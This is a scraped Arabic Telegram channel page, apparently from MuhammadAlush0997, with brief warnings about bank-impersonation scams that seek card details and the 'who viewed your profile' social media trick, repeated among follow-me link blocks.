تصلك رسائل الاحتيال عبر تقمص شخصية موظف في المصرف الذي تتعامل معه حيث يرسل اليك رسائل يطالبك فيها بمعلومات حول حسابك البنكي او بطاقة الائتمان بحجة التأكد من ارقامها ... احذر ولا تعطي معلومات بطاقتك لأي شخص او جهة كانت.
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
الاحتيال عبر خدعة تصفح حسابك
الكثير من المستخدمين تم الايقاع بهم على الشبكات الاجتماعية من خلال حيلة اعرف من تصفح حسابك على فيسبوك او اي شبكة تواصل اخرى.
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
الكثير من المستخدمين تم الايقاع بهم على الشبكات الاجتماعية من خلال حيلة اعرف من تصفح حسابك على فيسبوك او اي شبكة تواصل اخرى.
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube